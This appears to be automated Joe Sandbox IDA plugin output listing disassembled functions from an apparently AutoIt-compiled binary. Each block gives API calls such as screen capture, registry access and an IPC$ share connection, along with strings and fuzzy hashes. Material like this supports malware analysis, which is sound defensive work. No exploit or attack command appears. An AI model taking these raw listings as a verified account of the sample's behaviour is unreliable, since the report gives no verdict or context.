Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 2256f195876f26179ade592e142a8250d74ae911199cfa162a1b52f3147fb16f
Instruction ID: f2d1eaf03933605e4b91a6268f59d2e8a8ebf289a7d4915429557a2d8ac31686
Opcode Fuzzy Hash: 2256f195876f26179ade592e142a8250d74ae911199cfa162a1b52f3147fb16f
Instruction Fuzzy Hash: 60818E706083099FE760CF14C995EBABBE5FF88754F00492DFA9597691C730E904EB52

Function 000E731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 000E738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 000E739B
CreateCompatibleDC.GDI32(?), ref: 000E73A7
SelectObject.GDI32(00000000,?), ref: 000E73B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 000E7408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 000E7444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 000E7468
SelectObject.GDI32(00000006,?), ref: 000E7470
DeleteObject.GDI32(?), ref: 000E7479
DeleteDC.GDI32(00000006), ref: 000E7480
ReleaseDC.USER32(00000000,?), ref: 000E748B

Strings

(, xrefs: 000E7410

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 810412116c5cb6a32870a18ec997de8e783185aa0fd292d80bfcd9547277130b
Instruction ID: 3f5ce15ac196cc4b902fa13bebea2da4008df1528c1a811b530ee765d4194f7e
Opcode Fuzzy Hash: 810412116c5cb6a32870a18ec997de8e783185aa0fd292d80bfcd9547277130b
Instruction Fuzzy Hash: 60516A7190434AEFDB24CFA9CC84EAEBBB9EF48310F14842DF959A7211C735A940DB50

Function 00076A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00090957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00076B0C,?,00008000), ref: 00090973

Part of subcall function 00074750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00074743,?,?,000737AE,?), ref: 00074770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00076BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00076CFA

Part of subcall function 0007586D: _wcscpy.LIBCMT ref: 000758A5

Part of subcall function 0009363D: _iswctype.LIBCMT ref: 00093645

Strings

AU3!, xrefs: 00076B61
#include depth exceeded. Make sure there are no recursive includes, xrefs: 000AE421
Unterminated string, xrefs: 000AE7E4
Bad directive syntax error, xrefs: 000AE79D
EA06, xrefs: 000AE452
Error opening the file, xrefs: 000AE43D, 000AE4B8
>>>AUTOIT SCRIPT<<<, xrefs: 000AE496

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 3ac5c02a912ab8e3ca3c8127bf3e273ed0b0a64358181e2b6d3277d93e803aa0
Instruction ID: d92c05c283718ffd10e222645351f5b7600f116b43eeda87850e8a2d42c1997f
Opcode Fuzzy Hash: 3ac5c02a912ab8e3ca3c8127bf3e273ed0b0a64358181e2b6d3277d93e803aa0
Instruction Fuzzy Hash: E502DE309083419FC724EF24C881AEFBBE5EF99354F10891DF48A932A2DB75D949CB56

Function 000D2D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000D2D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 000D2DDD
GetMenuItemCount.USER32(00135890), ref: 000D2E66
DeleteMenu.USER32(00135890,00000005,00000000,000000F5,?,?), ref: 000D2EF6
DeleteMenu.USER32(00135890,00000004,00000000), ref: 000D2EFE
DeleteMenu.USER32(00135890,00000006,00000000), ref: 000D2F06
DeleteMenu.USER32(00135890,00000003,00000000), ref: 000D2F0E
GetMenuItemCount.USER32(00135890), ref: 000D2F16
SetMenuItemInfoW.USER32(00135890,00000004,00000000,00000030), ref: 000D2F4C
GetCursorPos.USER32(?), ref: 000D2F56
SetForegroundWindow.USER32(00000000), ref: 000D2F5F
TrackPopupMenuEx.USER32(00135890,00000000,?,00000000,00000000,00000000), ref: 000D2F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 000D2F7E

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 0618226614ea75139820a58e680d92005b804cd21572ee1d891b1496785fce33
Instruction ID: 7b00053eb283b196fcfdeee60d3ed4c33ca5d111a59acf142291232f7c1c1b87
Opcode Fuzzy Hash: 0618226614ea75139820a58e680d92005b804cd21572ee1d891b1496785fce33
Instruction Fuzzy Hash: 6271D570601306BEEB218F54DC45FAABFA9FF24714F104227F625AA2E1C7B15C60D7A4

Function 000C77DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00077BCC: _memmove.LIBCMT ref: 00077C06

_memset.LIBCMT ref: 000C786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 000C78A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 000C78BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 000C78D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 000C7902
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 000C792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 000C7935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 000C793A

Strings

\IPC$, xrefs: 000C7882
\CLSID, xrefs: 000C7822
SOFTWARE\Classes\, xrefs: 000C780C

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 3603c1261bd150dbbc0b2d077a183cc7ebdbe570fa243db9817d5f8774da729f
Instruction ID: d86dd526508fc44cdc57b163dc99f80821be9895128e320bb0d44cd6d843ae08
Opcode Fuzzy Hash: 3603c1261bd150dbbc0b2d077a183cc7ebdbe570fa243db9817d5f8774da729f
Instruction Fuzzy Hash: 4841E872C1422DABDF11EBA4DC85DEEB7B8FF04750F408069E909A31A2DB745D04CB94

Function 000F0E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,000EFDAD,?,?), ref: 000F0E31

Strings

HKEY_CURRENT_CONFIG, xrefs: 000F0EEE
HKEY_LOCAL_MACHINE, xrefs: 000F0E9A
HKEY_USERS, xrefs: 000F0F32
HKU, xrefs: 000F0F43
HKEY_CURRENT_USER, xrefs: 000F0F10
HKCU, xrefs: 000F0F21
HKLM, xrefs: 000F0EAF
HKCC, xrefs: 000F0EFF
HKCR, xrefs: 000F0ED9
HKEY_CLASSES_ROOT, xrefs: 000F0EC4

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 6e6dc0f2aab61b238197d62fb30fd4d71a021c4e576f0273b1b052cb671cfa83
Instruction ID: 0e62859c8d9621cd8e3e3b6be43b93865625a4bf6bb0a9845cb4af8a5764069e
Opcode Fuzzy Hash: 6e6dc0f2aab61b238197d62fb30fd4d71a021c4e576f0273b1b052cb671cfa83
Instruction Fuzzy Hash: F4417D3150025A8FCF20EF14EA55AFE37A0BF11340F544424FD592BA93DB34AD1AEBA1

Function 000CF7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,000AE2A0,00000010,?,Bad directive syntax error,000FF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 000CF7C2
LoadStringW.USER32(00000000,?,000AE2A0,00000010), ref: 000CF7C9

Part of subcall function 00077DE1: _memmove.LIBCMT ref: 00077E22

_wprintf.LIBCMT ref: 000CF7FC
__swprintf.LIBCMT ref: 000CF81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 000CF88D

Strings

Line %d (File "%s"):, xrefs: 000CF833
., xrefs: 000CF873
Line %d:, xrefs: 000CF818
Error: , xrefs: 000CF85B
%s (%d) : ==> %s.: %s %s, xrefs: 000CF7F7

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: 36639d7969416152d8ce8b8cc7804795854c64aad5ff24bbb810dfaa2b5cbbdf
Instruction ID: f9ce154cab53edd92949cd0b99761227f080cfa756b6f5536a217933515edb00
Opcode Fuzzy Hash: 36639d7969416152d8ce8b8cc7804795854c64aad5ff24bbb810dfaa2b5cbbdf
Instruction Fuzzy Hash: 9A214F31D0021EEBCF12EF90CC4AEFE7779BF18300F048469B519660A2DA759A28DB55

Function 000D52C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00077BCC: _memmove.LIBCMT ref: 00077C06

Part of subcall function 00077924: _memmove.LIBCMT ref: 000779AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 000D5330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 000D5346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000D5357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 000D5369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 000D537A

Strings

open , xrefs: 000D52DF
alias PlayMe, xrefs: 000D5309
play PlayMe, xrefs: 000D5375
close PlayMe, xrefs: 000D5341, 000D536E
status PlayMe mode, xrefs: 000D532B
play PlayMe wait, xrefs: 000D5364

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: c921561ec90116167a5e34c8282f882feae85b949aa4893d2079ca59ea4ac12b
Instruction ID: 4e73e0edc9773b6a64a90edbdeb23b9681c7af51f1b1ae1561dde55e611cbefa
Opcode Fuzzy Hash: c921561ec90116167a5e34c8282f882feae85b949aa4893d2079ca59ea4ac12b
Instruction Fuzzy Hash: 2111C170E5122D7AD760B765DC4ADFFBBBCEB95B80F00442AB809A21D2EFA00D04C5B0

Function 000D46B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 000D46D2
gethostname.WSOCK32(?,00000100), ref: 000D46EC
gethostbyname.WSOCK32(?), ref: 000D46F9
_wcscpy.LIBCMT ref: 000D4721
_memmove.LIBCMT ref: 000D4734
inet_ntoa.WSOCK32(?), ref: 000D473F
_strcat.LIBCMT ref: 000D474D
_wcscpy.LIBCMT ref: 000D4764
WSACleanup.WSOCK32 ref: 000D4772
_wcscpy.LIBCMT ref: 000D4780

Strings

0.0.0.0, xrefs: 000D471B

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 74d3863364aef3e0bedb89d084252e3e7578d34530873506cdfd49e72887d407
Instruction ID: 7e14879fd5da73fc4e6742952ad923d68a4f2021969e35ba2a7beb02982e87dc
Opcode Fuzzy Hash: 74d3863364aef3e0bedb89d084252e3e7578d34530873506cdfd49e72887d407
Instruction Fuzzy Hash: 4A11E7319082157FDF20AB309C4AEFA77BCEF01711F0441B6F545961A2EF748E82EA60

Function 000D4F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 000D4F7A

Part of subcall function 0009049F: timeGetTime.WINMM(?,7694B400,00080E7B), ref: 000904A3

Sleep.KERNEL32(0000000A), ref: 000D4FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 000D4FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 000D4FEC
SetActiveWindow.USER32 ref: 000D500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 000D5019
SendMessageW.USER32(00000010,00000000,00000000), ref: 000D5038
Sleep.KERNEL32(000000FA), ref: 000D5043
IsWindow.USER32 ref: 000D504F
EndDialog.USER32(00000000), ref: 000D5060

Strings

BUTTON, xrefs: 000D4FDE

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 4c2a0441bf31a58cece6cf7c3868e5db986f4ac2138e71f1f30612e961f10302
Instruction ID: 3ccf17bd629be12b6682e57a93f7eb750f5a3be6550cd84ece289023cdd9077f
Opcode Fuzzy Hash: 4c2a0441bf31a58cece6cf7c3868e5db986f4ac2138e71f1f30612e961f10302
Instruction Fuzzy Hash: 67215B71204706FFEB105F20EC89A3A3AA9EF44B86B045035F50582AB1CB758D90EA72

Function 000DD58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00079837: __itow.LIBCMT ref: 00079862
Part of subcall function 00079837: __swprintf.LIBCMT ref: 000798AC

CoInitialize.OLE32(00000000), ref: 000DD5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 000DD67D
SHGetDesktopFolder.SHELL32(?), ref: 000DD691
CoCreateInstance.OLE32(00102D7C,00000000,00000001,00128C1C,?), ref: 000DD6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 000DD74C
CoTaskMemFree.OLE32(?,?), ref: 000DD7A4
_memset.LIBCMT ref: 000DD7E1
SHBrowseForFolderW.SHELL32(?), ref: 000DD81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 000DD840
CoTaskMemFree.OLE32(00000000), ref: 000DD847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 000DD87E
CoUninitialize.OLE32(00000001,00000000), ref: 000DD880

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 2bc63934c92d187ee4695bbd4d44e1d036663f14d449e7cae05f8f13e608bb5f
Instruction ID: b10de2656db0035c014d4010203c9707970ae78625a988ab0cbf121ea062eb4c
Opcode Fuzzy Hash: 2bc63934c92d187ee4695bbd4d44e1d036663f14d449e7cae05f8f13e608bb5f
Instruction Fuzzy Hash: 46B1EB75A00209AFDB14DFA4C888DAEBBF9FF48314B1484A9E909DB361DB34ED41CB54

Function 000CC267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 000CC283
GetWindowRect.USER32(00000000,?), ref: 000CC295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 000CC2F3
GetDlgItem.USER32(?,00000002), ref: 000CC2FE
GetWindowRect.USER32(00000000,?), ref: 000CC310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 000CC364
GetDlgItem.USER32(?,000003E9), ref: 000CC372
GetWindowRect.USER32(00000000,?), ref: 000CC383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 000CC3C6
GetDlgItem.USER32(?,000003EA), ref: 000CC3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 000CC3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 000CC3FE

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 5500b9b04d8ce6bc20976ac84c22aa19736cab2ecda7336033d330e1ac5e032e
Instruction ID: a78f9919ecc922557c74526faffc303856185ff15e407f34a867a93145b2039f
Opcode Fuzzy Hash: 5500b9b04d8ce6bc20976ac84c22aa19736cab2ecda7336033d330e1ac5e032e
Instruction Fuzzy Hash: E7512E71B00205ABEB18CFA9DD99EBEBBB6EF88710F14812DF519D6290DB709D00CB10

Function 0007201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00071B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00072036,?,00000000,?,?,?,?,000716CB,00000000,?), ref: 00071B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 000720D3
KillTimer.USER32(-00000001,?,?,?,?,000716CB,00000000,?,?,00071AE2,?,?), ref: 0007216E
DestroyAcceleratorTable.USER32(00000000), ref: 000ABCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000716CB,00000000,?,?,00071AE2,?,?), ref: 000ABCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000716CB,00000000,?,?,00071AE2,?,?), ref: 000ABCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000716CB,00000000,?,?,00071AE2,?,?), ref: 000ABD0A
DeleteObject.GDI32(00000000), ref: 000ABD1C

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: e3f9868dd3f0e19442d96beea50b3bcb47a64aacc0693c6a696a4eabe2d5f7f3
Instruction ID: 7c2c2384fe06b78819e8efad22929e18af08aa39631458379f1a57e2b6bfe2cf
Opcode Fuzzy Hash: e3f9868dd3f0e19442d96beea50b3bcb47a64aacc0693c6a696a4eabe2d5f7f3
Instruction Fuzzy Hash: D861AB31900B01DFDB359F15C948B3AB7F2FF51712F508528E54A8BA72C778A890EBA4

Function 000721A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 000725DB: GetWindowLongW.USER32(?,000000EB), ref: 000725EC

GetSysColor.USER32(0000000F), ref: 000721D3

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: ff0f36ac325d6cde05b54d6eefe4de09b6b93d571537cf943e5500aa1c15c724
Instruction ID: a37782bc1bbf13e10be409ace45057942d3325bb6dc52e1b91ffcc978489ef71
Opcode Fuzzy Hash: ff0f36ac325d6cde05b54d6eefe4de09b6b93d571537cf943e5500aa1c15c724
Instruction Fuzzy Hash: 83419431500540EADB219F68DC88BB937A5FF06721F258265FE698A1E3C7398D42DB15

Function 000DA8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,000FF910), ref: 000DA90B
GetDriveTypeW.KERNEL32(00000061,001289A0,00000061), ref: 000DA9D5
_wcscpy.LIBCMT ref: 000DA9FF

Strings

removable, xrefs: 000DA93D
fixed, xrefs: 000DA953
ramdisk, xrefs: 000DA97F
all, xrefs: 000DA911
cdrom, xrefs: 000DA927
unknown, xrefs: 000DA996
network, xrefs: 000DA969

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
